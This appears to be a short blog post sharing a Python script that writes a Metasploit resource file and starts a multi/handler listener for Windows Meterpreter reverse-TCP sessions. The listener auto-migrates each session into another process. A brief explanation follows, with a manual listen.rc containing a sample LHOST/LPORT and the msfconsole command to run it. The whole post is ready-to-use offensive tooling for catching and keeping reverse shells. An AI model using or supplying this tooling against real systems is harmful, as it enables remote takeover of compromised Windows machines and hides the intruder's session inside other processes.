#!/usr/bin/python## StartListener.py# Simple python script to start a Meterpreter Listener# Auto Inject to other process# github: https://raw.github.com/obscuresec/random/master/StartListener.py import sysimport subprocess#write a resource file and call itdef build(lhost,lport): options = "use exploit/multi/handler\n" options += "set payload windows/meterpreter/reverse_tcp\nset LHOST {0}\nset LPORT {1}\n".format(lhost,lport) options += "set ExitOnSession false\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j\n" filewrite = file("listener.rc", "w") filewrite.write(options) filewrite.close() subprocess.Popen("/usr/share/metasploit-framework/msfconsole -r listener.rc", shell=True).wait()#grab argstry: lhost = sys.argv[1] lport = sys.argv[2] build(lhost,lport)#index errorexcept IndexError: print "python StartListener.py lhost lport"
A easy but useful script. It create a file of metaspolit and load it to start a listener quickly.
You can change the listener type you what.
Before using it, you may also have to change the path of msfconsole file.
If you installed the metaspolit-framework on you system, you can use "/usr/bin/msfconsole"
You can also create a file, such as "listen.rc"
use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.150set LPORT 8888set ExitOnSession falseset AutoRunScript post/windows/manage/migrateexploit -j
Then,use it to start a listen.
msfconsole -r listen.rc